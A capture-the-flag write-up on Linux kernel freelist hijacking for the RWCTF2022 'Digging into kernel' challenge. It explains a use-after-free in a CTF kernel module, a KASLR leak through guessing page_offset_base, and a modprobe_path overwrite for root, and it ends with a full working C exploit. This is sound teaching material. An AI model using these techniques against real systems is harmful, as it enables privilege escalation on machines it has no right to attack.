Freelist Hijacking

Much like the userspace glibc technique of allocating a fake chunk to overwrite __free_hook, in the kernel we can overwrite the next pointer of a free object on the freelist so that a later allocation returns an object at an arbitrary kernel address. We can then modify useful kernel data (for example, certain function tables) to escalate privileges.

Example: RWCTF2022 University Contest - Digging into kernel 1 & 2

The two challenges are essentially the same: the startup script of the first one had a flaw that allowed the flag to be read directly, so the second one is simply the first with the script fixed.

Challenge attachments can be downloaded at https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/linux/kernel-mode/RWCTF2022-digging-into-kernel-2.

Challenge Analysis

First, let's look at the startup script:

qemu-system-x86_64 \
    -kernel bzImage \
    -initrd rootfs.cpio \
    -append "console=ttyS0 root=/dev/ram rdinit=/sbin/init quiet kalsr" \
    -cpu kvm64,+smep,+smap \
    -monitor null \
    --nographic

SMEP and SMAP are enabled. The challenge author misspelled kaslr as kalsr, but this does not matter: KASLR is enabled by default.

Checking /sys/devices/system/cpu/vulnerabilities/*, we can see from the "Mitigation: PTI" line that KPTI is enabled:

/home $ cat /sys/devices/system/cpu/vulnerabilities/*
Processor vulnerable
Mitigation: PTE Inversion
Vulnerable: Clear CPU buffers attempted, no microcode; SMT Host state unknown
Mitigation: PTI
Vulnerable
Mitigation: usercopy/swapgs barriers and __user pointer sanitization
Mitigation: Full generic retpoline, STIBP: disabled, RSB filling
Not affected

The challenge provides an xkmod.ko file, which should be the vulnerable LKM as usual. Let's load it into IDA for analysis.

When the module is loaded, it creates a new kmem_cache called "lalala" with an object size of 192. Note that the last three parameters are all 0, corresponding to align, flags, and ctor (constructor). Since the SLAB_ACCOUNT flag is not set, this kmem_cache will be merged with kmalloc-192 by default.

int __cdecl xkmod_init()
{
  kmem_cache *v0; // rax

  printk(&unk_1E4);
  misc_register(&xkmod_device);
  v0 = (kmem_cache *)kmem_cache_create("lalala", 192LL, 0LL, 0LL, 0LL);
  buf = 0LL;
  s = v0;
  return 0;
}

The ioctl handler implements a typical heap menu: allocating, editing, and reading an object. Here buf is a global pointer. Note that none of the ioctl operations take a lock.

void __fastcall xkmod_ioctl(__int64 a1, int a2, __int64 a3)
{
  __int64 v3; // [rsp+0h] [rbp-20h] BYREF
  unsigned int v4; // [rsp+8h] [rbp-18h]
  unsigned int v5; // [rsp+Ch] [rbp-14h]
  unsigned __int64 v6; // [rsp+10h] [rbp-10h]

  v6 = __readgsqword(0x28u);
  if ( a3 )
  {
    copy_from_user(&v3, a3, 16LL);
    if ( a2 == 107374182 )
    {
      if ( buf && v5 <= 0x50 && v4 <= 0x70 )
      {
        copy_from_user((char *)buf + (int)v4, v3, (int)v5);
        return;
      }
    }
    else
    {
      if ( a2 != 125269879 )
      {
        if ( a2 == 17895697 )
          buf = (void *)kmem_cache_alloc(s, 3264LL);
        return;
      }
      if ( buf && v5 <= 0x50 && v4 <= 0x70 )
      {
        copy_to_user(v3, (char *)buf + (int)v4, (int)v5);
        return;
      }
    }
    xkmod_ioctl_cold();
  }
}

We should pass in the following structure:

struct Data
{
    size_t *ptr;
    unsigned int offset;
    unsigned int length;
}data;
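As a sanity check on this interface, the userspace sketch below restates the request layout and the driver's bounds check. The `XKMOD_*` macro names and the two helper functions are made up for illustration (the module only contains the raw numbers), and the layout assertions assume the x86-64 Linux ABI, where a pointer is 8 bytes.

```c
#include <stdbool.h>
#include <stddef.h>

/* Request codes from the decompiled ioctl handler, written in hex.
 * The macro names are illustrative; the module only has the numbers. */
#define XKMOD_ALLOC 0x1111111 /* 17895697  */
#define XKMOD_EDIT  0x6666666 /* 107374182 */
#define XKMOD_READ  0x7777777 /* 125269879 */

#define XKMOD_OBJ_SIZE 192 /* object size passed to kmem_cache_create() */

/* Same layout as the 16 bytes the handler copies from userspace. */
struct Data {
    size_t *ptr;         /* v3: userspace buffer        */
    unsigned int offset; /* v4: offset into the object  */
    unsigned int length; /* v5: number of bytes to copy */
};

/* Mirrors the driver's check: offset <= 0x70 and length <= 0x50. */
static bool xkmod_request_in_bounds(const struct Data *d)
{
    return d->offset <= 0x70 && d->length <= 0x50;
}

/* Largest end offset that still passes the check. */
static unsigned int xkmod_max_end(void)
{
    return 0x70 + 0x50;
}
```

The largest request that passes the check ends at 0x70 + 0x50 = 0xc0 = 192, which is exactly the object size, so the edit and read paths cannot run past the end of the object by themselves.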

The main vulnerability is that when the device file is closed, buf is freed but the global buf pointer is not set to NULL. If we open the device several times, closing one file descriptor frees buf while the others can still reach it, which gives us a UAF.

int __fastcall xkmod_release(inode *inode, file *file)
{
  return kmem_cache_free(s, buf);
}

This is basically a replica of babydriver from CISCN 2017...

Exploitation

We have a fully featured "heap menu" and a UAF that can be reused almost without limit. That is already enough to do whatever we want in kernel space (we do not even need the missing locking in ioctl), so many different solutions are possible.

Step.I - Achieving Arbitrary Kernel Address Read/Write

Let's first see what information the UAF gives us. After multiple attempts, the author found that when we read data from the freed buf, the first 8 bytes are always a pointer into the kernel heap, but usually with varying in-page offsets. This tells us three things:

The freelist pointer is stored at offset 0 of a free object in this kmem_cache
This kernel does not have freelist hardening (CONFIG_SLAB_FREELIST_HARDENED) enabled, since the pointer is stored in the clear
This kernel has freelist randomization (CONFIG_SLAB_FREELIST_RANDOM) enabled, since the free objects are not linked in address order

Freelist randomization is not a runtime protection: it only shuffles the order of the free objects within a page when a new slab is allocated. Subsequent allocations and frees still follow the last-in-first-out principle. Therefore, we can obtain a UAF on a free object, overwrite its next pointer with the address we want, and then allocate twice. The first allocation returns the UAF object itself and the second returns an object at the target address, which gives us arbitrary address read/write.

However, there is one catch. When the object at the target address is allocated, the first 8 bytes at that address are treated as its next pointer and become the new freelist head. They are usually not a valid address, so the next allocation from this cache would cause a kernel panic. We should therefore start the fake object at a spot whose first 8 bytes are zero, slightly before the data we actually want. The freelist then ends with a NULL pointer, which makes the kmem_cache request a new slab from the buddy system instead of crashing.
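The mechanism described above can be modeled in userspace. The sketch below is a toy, not SLUB: `toy_cache`, `toy_alloc`, `toy_free`, and `hijack` are made-up names, and the model assumes a single CPU, a next pointer at offset 0, and no freelist hardening. It ignores per-CPU slabs and partial lists entirely.

```c
#include <stdint.h>
#include <string.h>

#define OBJ_SIZE 192
#define NR_OBJS  4

/* Toy cache: the next-free pointer lives in the first 8 bytes of each
 * free object and is stored in the clear. */
struct toy_cache {
    void *freelist; /* head of the LIFO free list */
};

static unsigned char slab[NR_OBJS][OBJ_SIZE];

static void toy_free(struct toy_cache *c, void *obj)
{
    memcpy(obj, &c->freelist, sizeof(void *)); /* obj->next = head */
    c->freelist = obj;                         /* head = obj       */
}

static void *toy_alloc(struct toy_cache *c)
{
    void *obj = c->freelist;

    if (!obj)
        return NULL; /* a real cache would fetch a new slab here */
    memcpy(&c->freelist, obj, sizeof(void *)); /* head = obj->next */
    return obj;
}

/* Put every object of the toy slab on the freelist; slab[0] ends up first. */
static void toy_init(struct toy_cache *c)
{
    c->freelist = NULL;
    for (int i = NR_OBJS - 1; i >= 0; i--)
        toy_free(c, slab[i]);
}

/* Free `victim`, overwrite its stale next pointer (the UAF write), then
 * allocate twice. Returns the second allocation; *head_after receives the
 * freelist head left behind, i.e. the first 8 bytes of `target`. */
static void *hijack(struct toy_cache *c, void *victim, void *target,
                    void **head_after)
{
    void *got;

    toy_free(c, victim);
    memcpy(victim, &target, sizeof(void *)); /* victim->next = target */
    (void)toy_alloc(c);                      /* returns victim        */
    got = toy_alloc(c);                      /* returns target        */
    *head_after = c->freelist;
    return got;
}
```

If the first 8 bytes of the target are zero, `*head_after` is NULL and the toy cache is simply empty afterwards. If they hold anything else, that value becomes the freelist head, and the next allocation would dereference it.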

Careful readers may have noticed that the original slab still holds a number of free objects, and abandoning them leaks memory. However, such a small leak has no noticeable effect, and in any case it is not something we as attackers need to worry about (laughs).

Step.II - Leaking the Kernel Base Address

Next, let's consider how to leak the kernel base address. Although the kmem_cache created by the challenge is merged with kmalloc-192 by default, we will treat it as an independent kmem_cache in the exploit, to stay true to the challenge author's intent.

The address of the secondary_startup_64 function is stored at page_offset_base + 0x9d000, where page_offset_base is the kernel "heap base address" (the base of the direct mapping of physical memory). We can read a heap address from the next pointer of a free object and guess page_offset_base from it, then allocate an object near page_offset_base + 0x9d000 to leak the kernel base address. Conveniently, there is a zeroed region just before this address, which suits our allocation.

If the guess is wrong, the author believes we can simply retry. Note, however, that the process must not exit directly: the file descriptors of the original process should stay open, because closing them on exit would trigger slub's double free detection. In the author's testing, the heap base address is guessed correctly in most cases.
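The address arithmetic of this step can be sketched as follows. The function and macro names are hypothetical; the constants (the 0x9d000 offset, the 0x10 adjustment, the 0x30 page offset of secondary_startup_64, and the 0xffffffff81000000 text base) are the ones this write-up uses for this particular kernel and would differ on other builds.

```c
#include <stdbool.h>
#include <stdint.h>

#define KERNEL_TEXT_NOKASLR   0xffffffff81000000ULL /* text base without KASLR       */
#define STARTUP64_PAGE_OFFSET 0x30ULL    /* low 12 bits of secondary_startup_64 here */
#define TEXT_PTR_OFFSET       0x9d000ULL /* offset of the stored text pointer        */

/* Guess page_offset_base by clearing the low 28 bits of a heap pointer.
 * The guess is right only if page_offset_base is 256 MiB aligned and the
 * leaked object lies less than 256 MiB above it. */
static uint64_t guess_page_offset_base(uint64_t heap_leak)
{
    return heap_leak & 0xfffffffff0000000ULL;
}

/* Value to write into the hijacked next pointer: the fake object starts
 * 0x10 bytes early so that its first 8 bytes fall in the zeroed region. */
static uint64_t leak_chunk_addr(uint64_t page_offset_base)
{
    return page_offset_base + TEXT_PTR_OFFSET - 0x10;
}

/* Validate the leaked pointer by its page offset and derive the base.
 * Returns false when the guess missed and the data is something else. */
static bool kernel_base_from_leak(uint64_t text_leak, uint64_t *kernel_base)
{
    if ((text_leak & 0xfff) != STARTUP64_PAGE_OFFSET)
        return false;
    *kernel_base = text_leak - STARTUP64_PAGE_OFFSET;
    return true;
}

/* KASLR slide, to be added to any address taken from the unslid image. */
static uint64_t kaslr_offset(uint64_t kernel_base)
{
    return kernel_base - KERNEL_TEXT_NOKASLR;
}
```

For example, a made-up leak of 0xffff9f3a43a4c0c0 gives a guessed base of 0xffff9f3a40000000 and a fake object at 0xffff9f3a4009cff0. Because the object starts 0x10 bytes early, the text pointer shows up as the third 8-byte word of the data read back.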

Step.III - Modifying modprobe_path to Execute Programs as Root

Next, let's consider how to complete the exploit through arbitrary address write. A common approach is to overwrite some globally writable function tables in the kernel (such as n_tty_ops) to hijack the kernel execution flow. Here the author chose to overwrite modprobe_path to execute programs as root.

When we try to execute (execve) an invalid file (one whose magic number matches no known binary format), the kernel goes through the following call chain:

entry_SYSCALL_64()
    sys_execve()
        do_execve()
            do_execveat_common()
                bprm_execve()
                    exec_binprm()
                        search_binary_handler()
                            __request_module() // wrapped as request_module
                                call_modprobe()

call_modprobe() is defined in kernel/kmod.c. We mainly focus on this part of the code (from kernel source 5.14):

static int call_modprobe(char *module_name, int wait)
{
    //...
    argv[0] = modprobe_path;
    argv[1] = "-q";
    argv[2] = "--";
    argv[3] = module_name;  /* check free_modprobe_argv() */
    argv[4] = NULL;

    info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL,
                     NULL, free_modprobe_argv, NULL);
    if (!info)
        goto free_module_name;

    return call_usermodehelper_exec(info, wait | UMH_KILLABLE);
    //...

Here it calls call_usermodehelper_exec(), which runs the file whose path is stored in modprobe_path with root privileges. By default, modprobe_path holds /sbin/modprobe.

It's easy to see that if we can hijack modprobe_path and rewrite it to the path of a malicious script we specify, then when we execute an invalid file, the kernel will execute our malicious script with root privileges.
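The userspace side of this trick only needs two files: the script that the kernel will run as root, and a file with a bogus magic number to execute. A minimal sketch of preparing them is shown below. The helper names are hypothetical and the paths are left to the caller; the script body is the one used in this write-up. Overwriting modprobe_path itself is not part of this sketch.

```c
#include <fcntl.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Create (or truncate) `path`, write `len` bytes, and set its mode.
 * Returns 0 on success, -1 on any failure. */
static int write_file_with_mode(const char *path, const void *data,
                                size_t len, mode_t mode)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, mode);
    int ok;

    if (fd < 0)
        return -1;

    ok = write(fd, data, len) == (ssize_t)len /* short write is a failure */
         && fchmod(fd, mode) == 0;            /* set mode despite umask   */
    if (close(fd) != 0)
        ok = 0;
    return ok ? 0 : -1;
}

/* Write the root script and the trigger file, both executable. */
static int prepare_modprobe_files(const char *script_path,
                                  const char *trigger_path)
{
    static const char script[] = "#!/bin/sh\nchmod 777 /flag\n";
    /* Four 0xff bytes: not the magic number of any executable format. */
    static const unsigned char bad_magic[4] = { 0xff, 0xff, 0xff, 0xff };

    if (write_file_with_mode(script_path, script, strlen(script), 0755) != 0)
        return -1;
    return write_file_with_mode(trigger_path, bad_magic,
                                sizeof(bad_magic), 0755);
}
```

Passing an explicit mode to open() matters here, because O_CREAT without a mode argument leaves the permissions of the new file undefined.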

EXPLOIT

The final exploit is as follows:

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <sched.h>

#define MODPROBE_PATH 0xffffffff82444700

struct Data
{
    size_t *ptr;
    unsigned int offset;
    unsigned int length;
};

#define ROOT_SCRIPT_PATH  "/home/getshell"
char root_cmd[] = "#!/bin/sh\nchmod 777 /flag";

/* bind the process to specific core */
void bindCore(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process bound to core \033[0m%d\n", core);
}

void errExit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    exit(EXIT_FAILURE);
}

void allocBuf(int dev_fd, struct Data *data)
{
    ioctl(dev_fd, 0x1111111, data);
}

void editBuf(int dev_fd, struct Data *data)
{
    ioctl(dev_fd, 0x6666666, data);
}

void readBuf(int dev_fd, struct Data *data)
{
    ioctl(dev_fd, 0x7777777, data);
}

int main(int argc, char **argv, char **envp)
{
    int dev_fd[5], root_script_fd, flag_fd;
    size_t kernel_heap_leak, kernel_text_leak;
    size_t kernel_base, kernel_offset, page_offset_base;
    char flag[0x100];
    struct Data data;

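    /* basic setup */
    bindCore(0);

    for (int i = 0; i < 5; i++) {
        dev_fd[i] = open("/dev/xkmod", O_RDONLY);
        if (dev_fd[i] < 0) {
            errExit("failed to open /dev/xkmod!");
        }
    }

    /* create fake modprobe_path file; O_CREAT requires an explicit mode */
    root_script_fd = open(ROOT_SCRIPT_PATH, O_RDWR | O_CREAT, 0755);
    if (root_script_fd < 0) {
        errExit("failed to create root script!");
    }
    /* sizeof - 1: do not write the trailing NUL into the script */
    write(root_script_fd, root_cmd, sizeof(root_cmd) - 1);
    close(root_script_fd);
    system("chmod +x " ROOT_SCRIPT_PATH);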

    /* construct UAF */
    data.ptr = malloc(0x1000);
    data.offset = 0;
    data.length = 0x50;
    memset(data.ptr, 0, 0x1000);

    allocBuf(dev_fd[0], &data);
    editBuf(dev_fd[0], &data);
    close(dev_fd[0]);

    /* leak kernel heap addr and guess the page_offset_base */
    readBuf(dev_fd[1], &data);
    kernel_heap_leak = data.ptr[0];
    page_offset_base = kernel_heap_leak & 0xfffffffff0000000;

    printf("[+] kernel heap leak: 0x%lx\n", kernel_heap_leak);
    printf("[!] GUESSING page_offset_base: 0x%lx\n", page_offset_base);

    /* try to alloc fake chunk at (page_offset_base + 0x9d000 - 0x10) */
    puts("[*] leaking kernel base...");

    data.ptr[0] = page_offset_base + 0x9d000 - 0x10;
    data.offset = 0;
    data.length = 8;

    editBuf(dev_fd[1], &data);
    allocBuf(dev_fd[1], &data);
    allocBuf(dev_fd[1], &data);

    data.length = 0x40;
    readBuf(dev_fd[1], &data);
    if ((data.ptr[2] & 0xfff) != 0x30) {
        printf("[!] invalid data leak: 0x%lx\n", data.ptr[2]);
        errExit("FAILED TO HIT page_offset_base! TRY AGAIN!");
    }

    kernel_base = data.ptr[2] - 0x30;
    kernel_offset = kernel_base - 0xffffffff81000000;
    printf("\033[32m\033[1m[+] kernel base:\033[0m 0x%lx\n", kernel_base);
    printf("\033[32m\033[1m[+] kernel offset:\033[0m 0x%lx\n", kernel_offset);

    /* hijack modprobe_path: allocate from a fresh slab, then free it to get a new UAF */
    puts("[*] hijacking modprobe_path...");

    allocBuf(dev_fd[1], &data);
    close(dev_fd[1]);

    data.ptr[0] = kernel_offset + MODPROBE_PATH - 0x10;
    data.offset = 0;
    data.length = 0x8;

    editBuf(dev_fd[2], &data);
    allocBuf(dev_fd[2], &data);
    allocBuf(dev_fd[2], &data);

    strcpy((char *) &data.ptr[2], ROOT_SCRIPT_PATH);
    data.length = 0x30;
    editBuf(dev_fd[2], &data);

    /* trigger the fake modprobe_path */
    puts("[*] triggering fake modprobe_path...");

    system("echo -e '\\xff\\xff\\xff\\xff' > /home/fake");
    system("chmod +x /home/fake");
    system("/home/fake");

    /* read flag */
    memset(flag, 0, sizeof(flag));

    flag_fd = open("/flag", O_RDWR);
    if (flag_fd < 0) {
        errExit("failed to chmod flag!");
    }

    read(flag_fd, flag, sizeof(flag) - 1);  /* keep the trailing NUL */
    printf("\033[32m\033[1m[+] Got flag: \033[0m%s\n", flag);

    return 0;
}